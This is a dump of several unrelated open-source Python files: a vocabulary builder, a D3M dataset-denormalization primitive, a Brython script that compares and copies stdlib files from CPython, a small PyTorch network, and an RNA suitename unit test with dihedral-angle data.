Vocabulary contains the most-frequent tokens up to max_vocabulary_size.
  We write it to vocabulary_path in a one-token-per-line format, so that when the
  vocabulary is loaded later, the token on the first line gets id=0, the token on
  the second line gets id=1, and so on.
Args:
vocabulary_path: path where the vocabulary will be created.
    data_path_patterns: glob pattern matching the data files used to create the vocabulary.
max_vocabulary_size: limit on the size of the created vocabulary.
tokenizer: a function to use to tokenize each data sentence;
if None, basic_tokenizer will be used.
normalize_digits: Boolean; if true, all digits are replaced by 0s.
"""
vocab = {}
if gfile.Exists(vocabulary_path):
sys.stderr.write(
        'vocabulary path %s exists. we will use the existing one\n' % vocabulary_path)
return
for data_f in glob.glob(data_path_patterns):
print("Creating vocabulary %s from data %s" % (vocabulary_path, data_f))
with gfile.GFile(data_f, mode="r") as f:
counter = 0
for line in f:
counter += 1
if counter % 100000 == 0:
print(" processing line %d" % counter)
tokens = tokenizer(line) if tokenizer else basic_tokenizer(line)
for w in tokens:
word = re.sub(_DIGIT_RE, "0", w) if normalize_digits else w
if word in vocab:
vocab[word] += 1
else:
vocab[word] = 1
  print('total vocab size: %s' % len(vocab))
vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get, reverse=True)
if len(vocab_list) > max_vocabulary_size:
vocab_list = vocab_list[:max_vocabulary_size]
with gfile.GFile(vocabulary_path, mode="w") as vocab_file:
for w in vocab_list:
vocab_file.write(w + "\n")
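# Usage sketch (hypothetical paths): create_vocabulary("vocab40000.txt", "data/train_*.txt", 40000)
# writes the 40000 most frequent tokens one per line, preceded by _PAD, _GO, _EOS and _UNK.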
def initialize_vocabulary(vocabulary_path):
"""Initialize vocabulary from file.
We assume the vocabulary is stored one-item-per-line, so a file:
dog
cat
will result in a vocabulary {"dog": 0, "cat": 1}, and this function will
also return the reversed-vocabulary ["dog", "cat"].
Args:
vocabulary_path: path to the file containing the vocabulary.
Returns:
a pair: the vocabulary (a dictionary mapping string to integers), and
the reversed vocabulary (a list, which reverses the vocabulary mapping).
Raises:
ValueError: if the provided vocabulary_path does not exist.
"""
if gfile.Exists(vocabulary_path):
rev_vocab = []
with gfile.GFile(vocabulary_path, mode="r") as f:
rev_vocab.extend(f.readlines())
rev_vocab = [line.strip().decode('utf8') for line in rev_vocab]
vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])
return vocab, rev_vocab
else:
    raise ValueError("Vocabulary file %s not found." % vocabulary_path)
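if __name__ == "__main__":
  # Minimal sketch (assumes this module's original Python 2 / TensorFlow environment):
  # basic_tokenizer splits on whitespace and the punctuation captured by _WORD_SPLIT.
  print(basic_tokenizer("hello, world!"))  # [u'hello', u',', u'world', u'!']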
|
autovideo/common/denormalize.py | HuaizhengZhang/autovideo | 233 | 12664088 | <reponame>HuaizhengZhang/autovideo
'''
Copyright 2021 D3M Team
Copyright (c) 2021 DATA Lab at Texas A&M University
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import os
import typing
import itertools
import numpy # type: ignore
import pandas # type: ignore
from d3m import container, exceptions, utils as d3m_utils
from d3m.base import utils as base_utils
from d3m.metadata import base as metadata_base, hyperparams
from d3m.primitive_interfaces import base, transformer
__all__ = ('DenormalizePrimitive',)
Inputs = container.Dataset
Outputs = container.Dataset
class Hyperparams(hyperparams.Hyperparams):
starting_resource = hyperparams.Hyperparameter[typing.Union[str, None]](
default=None,
semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],
description="From which resource to start denormalizing. If \"None\" then it starts from the dataset entry point.",
)
recursive = hyperparams.UniformBool(
default=True,
semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],
description="Denormalize recursively?",
)
many_to_many = hyperparams.UniformBool(
default=False,
semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],
description="Denormalize also many-to-many relations?",
)
discard_not_joined_tabular_resources = hyperparams.UniformBool(
default=False,
semantic_types=['https://metadata.datadrivendiscovery.org/types/ControlParameter'],
description="Should tabular resources which were not joined be discarded?",
)
# TODO: Implement support for M2M relations.
# TODO: Consider the case where there are loops in foreign keys.
# TODO: Add all column names together to "other names" metadata for column.
# TODO: Consider denormalizing deep-first instead of current iterative approach.
# It seems it might be better because when one table is referencing the second one twice,
# which might reference other tables further, then currently we first join the second table
# and then have to repeat joining other tables twice. But we could first join other tables
# once to the second table, and then just do the join with already joined second table.
# Not sure how to behave in "recursive == False" case then.
# TODO: Add a test where main table has a foreign key twice to same table (for example, person 1 and person 2 to table of persons).
class DenormalizePrimitive(transformer.TransformerPrimitiveBase[Inputs, Outputs, Hyperparams]):
"""
A primitive which converts a Dataset with multiple tabular resources into a Dataset with only one tabular resource,
based on known relations between tabular resources. Any resource which can be joined is joined (thus the resource
    itself is removed), and resources which could not be joined are kept unless the ``discard_not_joined_tabular_resources`` hyper-parameter is set to ``True``.
If hyper-parameter ``recursive`` is set to ``True``, the primitive will join tables recursively. For example,
if table 1 (main table) has a foreign key that points to table 2, and table 2 has a foreign key that points to table 3,
    then after table 2 is joined into table 1, table 1 will have a foreign key that points to table 3. So now the
primitive continues to join table 3 into the main table.
"""
__author__ = '<NAME> <<EMAIL>>'
metadata = metadata_base.PrimitiveMetadata(
{
'id': 'f31f8c1f-d1c5-43e5-a4b2-2ae4a761ef2e',
'version': '0.2.0',
'name': "Denormalize datasets",
'python_path': 'd3m.primitives.autovideo.common.denormalize',
'source': {
'name':'<NAME> - <NAME>',
'contact': 'mailto:<EMAIL>',
'uris': [
'https://gitlab.com/datadrivendiscovery/common-primitives/blob/master/common_primitives/denormalize.py',
'https://gitlab.com/datadrivendiscovery/common-primitives.git',
],
},
'algorithm_types': [
metadata_base.PrimitiveAlgorithmType.DATA_DENORMALIZATION,
],
'primitive_family': metadata_base.PrimitiveFamily.DATA_TRANSFORMATION,
},
)
def __init__(self, *, hyperparams: Hyperparams) -> None:
super().__init__(hyperparams=hyperparams)
def produce(self, *, inputs: Inputs, timeout: float = None, iterations: int = None) -> base.CallResult[Outputs]:
# If only one tabular resource is in the dataset, we do not have anything to do.
tabular_resource_ids = [dataset_resource_id for dataset_resource_id, dataset_resource in inputs.items() if isinstance(dataset_resource, container.DataFrame)]
if len(tabular_resource_ids) == 1:
return base.CallResult(inputs)
# We could set "pick_one" to "False" because we already checked for that, but we leave it
# as "True" because then error messages are more meaningful for this case.
main_resource_id, main_resource = base_utils.get_tabular_resource(inputs, self.hyperparams['starting_resource'])
# Graph is the adjacency representation for the relations graph.
graph = inputs.get_relations_graph()
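        # Each graph entry maps a resource id to a list of edges of the form
        # (other resource id, direction flag, from column index, to column index,
        # custom state dict), matching the type hints on the helper methods below.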
resources = dict(inputs)
metadata = inputs.metadata
all_resources_joined = set()
while self._has_forward_edges(graph, main_resource_id):
# "resources" and "graph" are modified in-place.
metadata, resources_joined = self._denormalize(resources, metadata, main_resource_id, graph)
all_resources_joined.update(resources_joined)
if not self.hyperparams['recursive']:
break
# Do we discard all other tabular resources (including joined ones)?
if self.hyperparams['discard_not_joined_tabular_resources']:
resources_to_remove = []
for resource_id, resource in resources.items():
if resource_id == main_resource_id:
continue
if not isinstance(resource, container.DataFrame):
continue
resources_to_remove.append(resource_id)
# Discard only joined tabular resources and which no other resource depends on.
else:
# We deal only with tabular resources here.
dependent_upon_resources = self._get_dependent_upon_resources(graph)
resources_to_remove = [resource_id for resource_id in sorted(all_resources_joined - dependent_upon_resources) if resource_id != main_resource_id]
for resource_id in resources_to_remove:
assert resource_id != main_resource_id
del resources[resource_id]
metadata = metadata.remove((resource_id,), recursive=True)
metadata = metadata.update((), {
'dimension': {
'length': len(resources),
},
})
return base.CallResult(container.Dataset(resources, metadata))
def _has_forward_edges(self, graph: typing.Dict[str, typing.List[typing.Tuple[str, bool, int, int, typing.Dict]]], resource_id: str) -> bool:
# We check first to not create a list in "graph" when accessing it.
if resource_id not in graph:
return False
for edge_resource_id, edge_direction, edge_from_index, edge_to_index, custom_state in graph[resource_id]:
if edge_direction:
return True
return False
def _has_edges_to_process(self, graph: typing.Dict[str, typing.List[typing.Tuple[str, bool, int, int, typing.Dict]]], resource_id: str) -> bool:
# We check first to not create a list in "graph" when accessing it.
if resource_id not in graph:
return False
for edge_resource_id, edge_direction, edge_from_index, edge_to_index, custom_state in graph[resource_id]:
if custom_state.get('process', False):
return True
return False
def _denormalize(self, resources: typing.Dict, metadata: metadata_base.DataMetadata, main_resource_id: str,
graph: typing.Dict[str, typing.List[typing.Tuple[str, bool, int, int, typing.Dict]]]) -> typing.Tuple[metadata_base.DataMetadata, typing.Set[str]]:
"""
Finds all tables which are pointed to by the main resource and join them into the main table.
``resources`` and ``graph`` are modified in-place.
"""
resources_joined: typing.Set[str] = set()
main_resource = resources[main_resource_id]
# Should not really happen.
if main_resource_id not in graph:
return metadata, resources_joined
# We mark all current edges to be processed. We might be adding more edges to the list,
        # but in this call we only want to process those which existed at the beginning.
for edge_resource_id, edge_direction, edge_from_index, edge_to_index, custom_state in graph[main_resource_id]:
custom_state['process'] = True
while self._has_edges_to_process(graph, main_resource_id):
edge_resource_id, edge_direction, edge_from_index, edge_to_index, custom_state = graph[main_resource_id][0]
if not custom_state.get('process', False):
continue
del custom_state['process']
if not edge_direction:
# For now we just remove this relation.
# TODO: Support M2M relations.
# We remove the relation we would have joined, backward.
self._remove_graph_edge(graph, main_resource_id, edge_resource_id, False, edge_from_index, edge_to_index)
# We remove the relation we would have joined, forward.
self._remove_graph_edge(graph, edge_resource_id, main_resource_id, True, edge_to_index, edge_from_index)
continue
if main_resource_id == edge_resource_id:
# TODO: Implement.
raise NotImplementedError("Support for loops is not implemented yet.")
# Calling "_join" updates column indices in "graph" and "metadata"
# and also removes the current joined edge from "graph"
main_resource, metadata = self._join(
main_resource_id, main_resource, edge_from_index,
edge_resource_id, resources[edge_resource_id], edge_to_index,
metadata, graph,
)
resources_joined.add(edge_resource_id)
resources[main_resource_id] = main_resource
return metadata, resources_joined
def _row_of_missing_values(self, resource: container.DataFrame, metadata: metadata_base.DataMetadata, resource_id: str) -> typing.List[typing.Any]:
row = []
for column_index, dtype in enumerate(resource.dtypes):
if dtype.kind in ['b', 'i', 'u', 'f', 'c']:
row.append(numpy.nan)
elif dtype.kind == 'O' and issubclass(metadata.query_column_field(column_index, 'structural_type', at=(resource_id,)), str):
row.append('')
else:
row.append(None)
return row
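    # _join resolves, for every row of the main resource, the matching row of the
    # foreign resource via the foreign-key column, splices the resolved foreign
    # columns in place of that column, and then updates metadata and the relations
    # graph so that all column indices stay consistent.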
def _join(self, main_resource_id: str, main_resource: container.DataFrame, main_column_index: int, foreign_resource_id: str,
foreign_resource: container.DataFrame, foreign_column_index: int, metadata: metadata_base.DataMetadata,
graph: typing.Dict[str, typing.List[typing.Tuple[str, bool, int, int, typing.Dict]]]) -> typing.Tuple[container.DataFrame, metadata_base.DataMetadata]:
if main_resource_id == foreign_resource_id:
# TODO: Implement.
raise NotImplementedError("Support for loops is not implemented yet.")
# We use this information later on.
one_to_one_relation = foreign_resource.iloc[:, foreign_column_index].sort_values().equals(main_resource.iloc[:, main_column_index].sort_values())
foreign_indexer = pandas.Index(foreign_resource.iloc[:, foreign_column_index]).get_indexer(main_resource.iloc[:, main_column_index])
# "get_indexer" sets all unresolved values to -1.
unresolved_rows = foreign_indexer == -1
# We store dtypes so that we can later on compare.
foreign_resource_dtypes = foreign_resource.dtypes
        # "take" maps -1 to the last row, so below we overwrite those unresolved rows with a row of missing values.
resolved_foreign_resource = foreign_resource.take(foreign_indexer).reset_index(drop=True)
if unresolved_rows.any():
# Set all unresolved rows to a row of missing values.
resolved_foreign_resource.iloc[unresolved_rows, :] = self._row_of_missing_values(foreign_resource, metadata, foreign_resource_id)
# And store final dtypes so that we can later on compare.
resolved_foreign_resource_dtypes = resolved_foreign_resource.dtypes
# This makes a copy so that we can modify metadata in-place.
metadata = metadata.update(
(metadata_base.ALL_ELEMENTS,),
{},
)
# TODO: Move this to metadata API.
# We reorder metadata for rows.
for element_metadata_entry in [
metadata._current_metadata.all_elements,
metadata._current_metadata.elements[foreign_resource_id],
]:
if element_metadata_entry is None:
continue
elements = element_metadata_entry.elements
new_elements_evolver = d3m_utils.EMPTY_PMAP.evolver()
for i, row_index in enumerate(foreign_indexer):
if row_index == -1:
continue
if row_index in elements:
new_elements_evolver.set(i, elements[row_index])
element_metadata_entry.elements = new_elements_evolver.persistent()
element_metadata_entry.is_elements_empty = not element_metadata_entry.elements
element_metadata_entry.update_is_empty()
assert resolved_foreign_resource.shape[1] > 0
main_resource = pandas.concat([
main_resource.iloc[:, 0:main_column_index],
resolved_foreign_resource,
main_resource.iloc[:, main_column_index + 1:],
], axis=1)
old_semantic_types = metadata.query_column(main_column_index, at=(main_resource_id,)).get('semantic_types', [])
# First we remove metadata for the existing column.
# This makes a copy so that we can modify metadata in-place.
metadata = metadata.remove_column(main_column_index, at=(main_resource_id,), recursive=True)
# TODO: Move this to metadata API.
# Move columns and make space for foreign metadata to be inserted.
# We iterate over a list so that we can change dict while iterating.
for element_metadata_entry in itertools.chain(
[metadata._current_metadata.all_elements.all_elements if metadata._current_metadata.all_elements is not None else None],
metadata._current_metadata.all_elements.elements.values() if metadata._current_metadata.all_elements is not None else iter([None]),
[metadata._current_metadata.elements[main_resource_id].all_elements],
metadata._current_metadata.elements[main_resource_id].elements.values(),
):
if element_metadata_entry is None:
continue
new_elements_evolver = element_metadata_entry.elements.evolver()
for element_index in element_metadata_entry.elements.keys(reverse=True):
# We removed metadata for "main_column_index".
assert element_index != main_column_index
element_index = typing.cast(int, element_index)
if main_column_index < element_index:
metadata_dict = new_elements_evolver[element_index]
new_elements_evolver.remove(element_index)
new_elements_evolver.set(element_index + resolved_foreign_resource.shape[1] - 1, metadata_dict)
element_metadata_entry.elements = new_elements_evolver.persistent()
element_metadata_entry.is_elements_empty = not element_metadata_entry.elements
element_metadata_entry.update_is_empty()
# And copy over metadata for new (replaced) columns in place of the existing column.
for column_index in range(resolved_foreign_resource.shape[1]):
# To go over "ALL_ELEMENTS" and all rows.
for element in metadata.get_elements((foreign_resource_id,)):
metadata = metadata.copy_to(
metadata,
[foreign_resource_id, element, metadata_base.ALL_ELEMENTS],
[main_resource_id, element, main_column_index + column_index],
ignore_all_elements=True,
)
metadata = metadata.copy_to(
metadata,
[foreign_resource_id, element, column_index],
[main_resource_id, element, main_column_index + column_index],
ignore_all_elements=True,
)
# Update metadata for new (replaced) columns.
for column_index in range(main_column_index, main_column_index + resolved_foreign_resource.shape[1]):
# We copy semantic types describing the role of the column from the original column to all new (replaced) columns.
# TODO: Do not hard-code this list here but maybe extract it from "definitions.json"?
for semantic_type in [
'https://metadata.datadrivendiscovery.org/types/Attribute',
'https://metadata.datadrivendiscovery.org/types/Boundary',
'https://metadata.datadrivendiscovery.org/types/BoundingPolygon',
'https://metadata.datadrivendiscovery.org/types/Interval',
'https://metadata.datadrivendiscovery.org/types/IntervalEnd',
'https://metadata.datadrivendiscovery.org/types/IntervalStart',
'https://metadata.datadrivendiscovery.org/types/InstanceWeight',
'https://metadata.datadrivendiscovery.org/types/PrivilegedData',
'https://metadata.datadrivendiscovery.org/types/RedactedPrivilegedData',
'https://metadata.datadrivendiscovery.org/types/RedactedTarget',
'https://metadata.datadrivendiscovery.org/types/SuggestedPrivilegedData',
'https://metadata.datadrivendiscovery.org/types/SuggestedTarget',
'https://metadata.datadrivendiscovery.org/types/Target',
'https://metadata.datadrivendiscovery.org/types/PredictedTarget',
'https://metadata.datadrivendiscovery.org/types/TrueTarget',
'https://metadata.datadrivendiscovery.org/types/Score',
'https://metadata.datadrivendiscovery.org/types/Confidence',
'https://metadata.datadrivendiscovery.org/types/Time',
'https://metadata.datadrivendiscovery.org/types/Location',
]:
if semantic_type in old_semantic_types:
metadata = metadata.add_semantic_type((main_resource_id, metadata_base.ALL_ELEMENTS, column_index), semantic_type)
is_column_unique = main_resource.iloc[:, column_index].is_unique
column_semantic_types = metadata.query_column(column_index, at=(main_resource_id,)).get('semantic_types', [])
was_column_unique = 'https://metadata.datadrivendiscovery.org/types/PrimaryKey' in column_semantic_types \
or 'https://metadata.datadrivendiscovery.org/types/UniqueKey' in column_semantic_types
# Foreign keys can reference same foreign row multiple times, so values in this column might not be even
# unique anymore, nor they are a primary key at all. So we remove the semantic type marking a column as such.
# We re-set semantic type for any real primary key later on.
metadata = metadata.remove_semantic_type((main_resource_id, metadata_base.ALL_ELEMENTS, column_index), 'https://metadata.datadrivendiscovery.org/types/PrimaryKey')
metadata = metadata.remove_semantic_type((main_resource_id, metadata_base.ALL_ELEMENTS, column_index), 'https://metadata.datadrivendiscovery.org/types/PrimaryMultiKey')
metadata = metadata.remove_semantic_type((main_resource_id, metadata_base.ALL_ELEMENTS, column_index), 'https://metadata.datadrivendiscovery.org/types/UniqueKey')
# We re-set semantic type for column which was and is still unique.
if was_column_unique and is_column_unique:
metadata = metadata.add_semantic_type((main_resource_id, metadata_base.ALL_ELEMENTS, column_index), 'https://metadata.datadrivendiscovery.org/types/UniqueKey')
old_dtype = foreign_resource_dtypes.iloc[column_index - main_column_index]
new_dtype = resolved_foreign_resource_dtypes.iloc[column_index - main_column_index]
if old_dtype is not new_dtype:
# Not a nice way to convert a dtype to Python type, but it works.
old_type = type(numpy.zeros(1, old_dtype).tolist()[0])
new_type = type(numpy.zeros(1, new_dtype).tolist()[0])
if old_type is not new_type:
# Type changed, we have to update metadata about the structural type.
metadata = metadata.update((main_resource_id, metadata_base.ALL_ELEMENTS, column_index), {
'structural_type': new_type,
})
# If the original column was a primary key, we should re-set it back.
if 'https://metadata.datadrivendiscovery.org/types/PrimaryKey' in old_semantic_types and (one_to_one_relation or not unresolved_rows.any()):
if main_resource.iloc[:, main_column_index].is_unique:
metadata = metadata.add_semantic_type((main_resource_id, metadata_base.ALL_ELEMENTS, main_column_index), 'https://metadata.datadrivendiscovery.org/types/PrimaryKey')
# Removing "UniqueKey" if it was set before, "PrimaryKey" surpasses it.
metadata = metadata.remove_semantic_type((main_resource_id, metadata_base.ALL_ELEMENTS, main_column_index), 'https://metadata.datadrivendiscovery.org/types/UniqueKey')
else:
metadata = metadata.add_semantic_type((main_resource_id, metadata_base.ALL_ELEMENTS, main_column_index), 'https://metadata.datadrivendiscovery.org/types/PrimaryMultiKey')
elif 'https://metadata.datadrivendiscovery.org/types/PrimaryMultiKey' in old_semantic_types and (one_to_one_relation or not unresolved_rows.any()):
metadata = metadata.add_semantic_type((main_resource_id, metadata_base.ALL_ELEMENTS, main_column_index), 'https://metadata.datadrivendiscovery.org/types/PrimaryMultiKey')
# TODO: Update boundary columns and "confidence for" references.
# This is not currently needed because all file collections are just one column so they do not
# move the column indices. But as a general case we should be updating all standard column references.
# Update columns number in the main resource.
metadata = metadata.update((main_resource_id, metadata_base.ALL_ELEMENTS), {
'dimension': {
'length': main_resource.shape[1],
},
})
# We remove the relation we just joined, forward.
self._remove_graph_edge(graph, main_resource_id, foreign_resource_id, True, main_column_index, foreign_column_index)
# We remove the relation we just joined, backward.
self._remove_graph_edge(graph, foreign_resource_id, main_resource_id, False, foreign_column_index, main_column_index)
# We have to update column indices if they have changed because we inserted new columns.
for resource_id, edges in graph.items():
if resource_id == main_resource_id:
for i, (edge_resource_id, edge_direction, edge_from_index, edge_to_index, custom_state) in enumerate(edges):
if edge_direction and main_column_index < edge_from_index:
# We replaced one column with "resolved_foreign_resource.shape[1]" columns, so there is
# "resolved_foreign_resource.shape[1] - 1" new columns to shift indices for.
edges[i] = (edge_resource_id, edge_direction, edge_from_index + resolved_foreign_resource.shape[1] - 1, edge_to_index, custom_state)
else:
for i, (edge_resource_id, edge_direction, edge_from_index, edge_to_index, custom_state) in enumerate(edges):
if edge_resource_id == main_resource_id and not edge_direction and main_column_index < edge_to_index:
# We replaced one column with "resolved_foreign_resource.shape[1]" columns, so there is
# "resolved_foreign_resource.shape[1] - 1" new columns to shift indices for.
edges[i] = (edge_resource_id, edge_direction, edge_from_index, edge_to_index + resolved_foreign_resource.shape[1] - 1, custom_state)
# If foreign resource has any additional relations, we copy them to new columns in the main resource.
if foreign_resource_id in graph:
# We iterate over a list so that we can change graph while iterating.
for edge_resource_id, edge_direction, edge_from_index, edge_to_index, custom_state in list(graph[foreign_resource_id]):
if edge_resource_id in [main_resource_id, foreign_resource_id]:
# TODO: Implement.
raise NotImplementedError("Support for loops is not implemented yet.")
if edge_direction:
graph[main_resource_id].append((edge_resource_id, True, main_column_index + edge_from_index, edge_to_index, {}))
graph[edge_resource_id].append((main_resource_id, False, edge_to_index, main_column_index + edge_from_index, {}))
else:
# TODO: What should we do about backward relations?
# For now we just ignore backward relations because we do not support M2M relations.
# For the foreign resource we just joined, we could change all relations to instead point
# to the main resource. This might be tricky though if we have a situation where main table
# includes table 1 twice, and table 1 has a relation to table 2. If we after joining table 1
# once rewrite all backward relations from table 2 to table 1 to point to main table now,
# when we get to join the table 1 the second time we might have issues. This is why it might
# better to start joining deep-first. See another TODO.
# TODO: We might have to also update foreign key metadata in this case.
# We might want to update metadata so that if table 1 is joined to the main table, and there is
# also table 2 which has a foreign key that points to table 1, then the foreign key in table 2
# should point to the main table after joining. But what if main table has a foreign key to
# table 1 twice? How do we then update metadata in table 2 to point twice to table 1?
# Metadata does not support that.
# A special case for now. If relation is one-to-one, then we can move backwards relations to the
# main resource without complications mentioned in TODOs above. Maybe some additional columns might
# be joined through M2M relations in this case, once that is supported, but generally this should not
# be a problem. It might add some duplicated columns at that point. This special case is useful
# when "learningData" with only targets is pointing to some other table with real attributes.
if one_to_one_relation:
self._remove_graph_edge(graph, edge_resource_id, foreign_resource_id, True, edge_to_index, edge_from_index)
self._remove_graph_edge(graph, foreign_resource_id, edge_resource_id, False, edge_from_index, edge_to_index)
graph[main_resource_id].append((edge_resource_id, False, main_column_index + edge_from_index, edge_to_index, custom_state))
graph[edge_resource_id].append((main_resource_id, True, edge_to_index, main_column_index + edge_from_index, custom_state))
# We override metadata for foreign key to make it point to the main resource (and not to foreign resource anymore).
metadata = metadata.update((edge_resource_id, metadata_base.ALL_ELEMENTS, edge_to_index), {
'foreign_key': {
'type': 'COLUMN',
'resource_id': main_resource_id,
'column_index': main_column_index + edge_from_index,
'column_name': metadata_base.NO_VALUE,
},
})
return main_resource, metadata
def _get_dependent_upon_resources(self, graph: typing.Dict[str, typing.List[typing.Tuple[str, bool, int, int, typing.Dict]]]) -> typing.Set[str]:
"""
Returns a set of resources which have other resources depend on them.
"""
dependent_upon_resources = set()
for resource_id, edges in graph.items():
for edge_resource_id, edge_direction, edge_from_index, edge_to_index, custom_state in edges:
if edge_direction:
dependent_upon_resources.add(edge_resource_id)
return dependent_upon_resources
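    # _remove_graph_edge deletes a single directed edge from the adjacency list and
    # drops the source resource's entry entirely once its edge list becomes empty.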
def _remove_graph_edge(self, graph: typing.Dict[str, typing.List[typing.Tuple[str, bool, int, int, typing.Dict]]],
resource_id: str, edge_resource_id: str, edge_direction: bool, edge_from_index: int, edge_to_index: int) -> None:
assert resource_id in graph
for i, edge in enumerate(graph[resource_id]):
if edge[0:4] == (edge_resource_id, edge_direction, edge_from_index, edge_to_index):
del graph[resource_id][i]
break
if not graph[resource_id]:
del graph[resource_id]
if __name__ == '__main__':
import logging
import pprint
import sys
logging.basicConfig()
for dataset_file_path in sys.argv[1:]:
try:
dataset = container.Dataset.load('file://{dataset_doc_path}'.format(dataset_doc_path=os.path.abspath(dataset_file_path)))
except Exception as error:
raise Exception("Unable to load dataset: {dataset_doc_path}".format(dataset_doc_path=dataset_file_path)) from error
primitive = DenormalizePrimitive(hyperparams=Hyperparams.defaults().replace({
'recursive': True,
'discard_not_joined_tabular_resources': False,
}))
try:
denormalized_dataset = primitive.produce(inputs=dataset).value
pprint.pprint(denormalized_dataset)
denormalized_dataset.metadata.pretty_print()
except Exception as error:
raise Exception("Unable to denormalize dataset: {dataset_doc_path}".format(dataset_doc_path=dataset_file_path)) from error
|
scripts/update_stlib_from_cpython.py | mementum/brython | 5,926 | 12664099 | <gh_stars>1000+
# compare Brython stdlib and CPython stdlib
import os
import filecmp
import shutil
bdir = os.path.join(os.path.dirname(os.getcwd()),
"www", "src", "Lib")
p_old_dir = r'c:\Python39\Lib'
p_new_dir = r'c:\Python310\Lib'
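# For every stdlib module shipped with Brython, compare it with the CPython 3.9
# and 3.10 copies: files that are identical to 3.9 but changed in 3.10 are copied
# over from 3.10; every other combination is only reported.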
for dirpath, dirnames, filenames in os.walk(bdir):
if "site-packages" in dirnames:
dirnames.remove("site-packages")
prefix = dirpath[len(bdir) + 1:]
print(prefix)
for filename in filenames:
if not filename.endswith(".py"):
continue
ppath = p_old_dir + "\\" + prefix + "\\" + filename
if os.path.exists(ppath):
brython_path = os.path.join(dirpath, filename)
brython_short = brython_path[len(bdir) + 1:]
if filecmp.cmp(brython_path, ppath, shallow=False):
p_new_path = p_new_dir + "\\" + prefix + "\\" + filename
if os.path.exists(p_new_path):
if filecmp.cmp(brython_path, p_new_path, shallow=False):
#print(brython_short, "same as CPython 3.9",
# "not changed in Python 3.10")
pass
else:
print(brython_short, "same as CPython 3.9",
"replace by 3.10 version")
shutil.copyfile(p_new_path, brython_path)
else:
print('***', brython_short, "same as CPython 3.9",
"not in Python 3.10")
else:
p_new_path = p_new_dir + "\\" + prefix + "\\" + filename
if os.path.exists(p_new_path):
if filecmp.cmp(brython_path, p_new_path, shallow=False):
#print(brython_short, "already changed to Python 3.10")
pass
else:
print('***', brython_short, 'not the same as CPython 3.9')
else:
print('***', brython_short, "not in Python 3.10")
else:
p_new_path = p_new_dir + "\\" + prefix + "\\" + filename
if os.path.exists(p_new_path):
print(ppath, "not in CPython 3.9, but present in 3.10")
else:
print(ppath, "not in CPython 3.9 and 3.10")
|
alg/edm/network/student_network.py | loramf/mlforhealthlabpub | 171 | 12664158 | from .base_network import *
class StudentNetwork(BaseNetwork):
def __init__(self,
in_dim : int,
out_dim : int,
width : int,
):
super(StudentNetwork, self).__init__()
self.in_dim = in_dim
self.out_dim = out_dim
self.width = width
self.layers = nn.Sequential(
nn.Linear(in_dim, width),
nn.ELU(),
nn.Linear(width, width),
nn.ELU(),
nn.Linear(width, out_dim),
)
def forward(self,
x : torch.Tensor,
) -> torch.Tensor:
return self.layers(x)
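if __name__ == "__main__":
    # Minimal sketch (assumes the module is run inside its package so the relative
    # import resolves, and that torch comes in via base_network's star import):
    net = StudentNetwork(in_dim=10, out_dim=2, width=64)
    print(net(torch.rand(32, 10)).shape)  # expected: torch.Size([32, 2])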
|
mmtbx/suitename/unit-test/UnitTest.py | dperl-sol/cctbx_project | 155 | 12664161 | <gh_stars>100-1000
from __future__ import nested_scopes, generators, division, absolute_import
from __future__ import with_statement, print_function
import os, sys, inspect
from io import StringIO
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)
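# Putting the parent suitename directory on sys.path lets this test import
# suitename, suites and regression directly when run from the unit-test folder.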
# here, before importing suitename, is an opportunity to set command line
# options and to redirect output.
# sys.argv.extend(["--noinc", "--chart", "--causes"])
# sys.stdout = open("output.txt", "w")
import suitename, suites, regression
# The test data:
#
# The first portion is to test membership in every cluster.
# The second portion is to test triage by an out-of-bounds value
# for each dihedral angle. The unnecessary part of each residue is damaged so
# the extra suite generated will be incomplete and will vanish.
input1=u''' :1a: : : : : Z: 9999.000: 9999.000: 9999.000: 81.495: 212.250: 288.831: 180.000
:1a: : : : : Z: 294.967: 173.990: 53.550: 81.035: 9999.000: 9999.000: 180.000
:1m: : : : : Z: 9999.000: 9999.000: 9999.000: 83.513: 218.120: 291.593: 180.000
:1m: : : : : Z: 292.247: 222.300: 58.067: 86.093: 9999.000: 9999.000: 180.000
:1L: : : : : Z: 9999.000: 9999.000: 9999.000: 85.664: 245.014: 268.257: 180.000
:1L: : : : : Z: 303.879: 138.164: 61.950: 79.457: 9999.000: 9999.000: 180.000
:&a: : : : : Z: 9999.000: 9999.000: 9999.000: 82.112: 190.682: 264.945: 180.000
:&a: : : : : Z: 295.967: 181.839: 51.455: 81.512: 9999.000: 9999.000: 180.000
:7a: : : : : Z: 9999.000: 9999.000: 9999.000: 83.414: 217.400: 222.006: 180.000
:7a: : : : : Z: 302.856: 160.719: 49.097: 82.444: 9999.000: 9999.000: 180.000
:3a: : : : : Z: 9999.000: 9999.000: 9999.000: 85.072: 216.324: 173.276: 180.000
:3a: : : : : Z: 289.320: 164.132: 45.876: 84.956: 9999.000: 9999.000: 180.000
:9a: : : : : Z: 9999.000: 9999.000: 9999.000: 83.179: 210.347: 121.474: 180.000
:9a: : : : : Z: 288.568: 157.268: 49.347: 81.047: 9999.000: 9999.000: 180.000
:1g: : : : : Z: 9999.000: 9999.000: 9999.000: 80.888: 218.636: 290.735: 180.000
:1g: : : : : Z: 167.447: 159.565: 51.326: 85.213: 9999.000: 9999.000: 180.000
:7d: : : : : Z: 9999.000: 9999.000: 9999.000: 83.856: 238.750: 256.875: 180.000
:7d: : : : : Z: 69.562: 170.200: 52.800: 85.287: 9999.000: 9999.000: 180.000
:3d: : : : : Z: 9999.000: 9999.000: 9999.000: 85.295: 244.085: 203.815: 180.000
:3d: : : : : Z: 65.880: 181.130: 54.680: 86.035: 9999.000: 9999.000: 180.000
:5d: : : : : Z: 9999.000: 9999.000: 9999.000: 79.671: 202.471: 63.064: 180.000
:5d: : : : : Z: 68.164: 143.450: 49.664: 82.757: 9999.000: 9999.000: 180.000
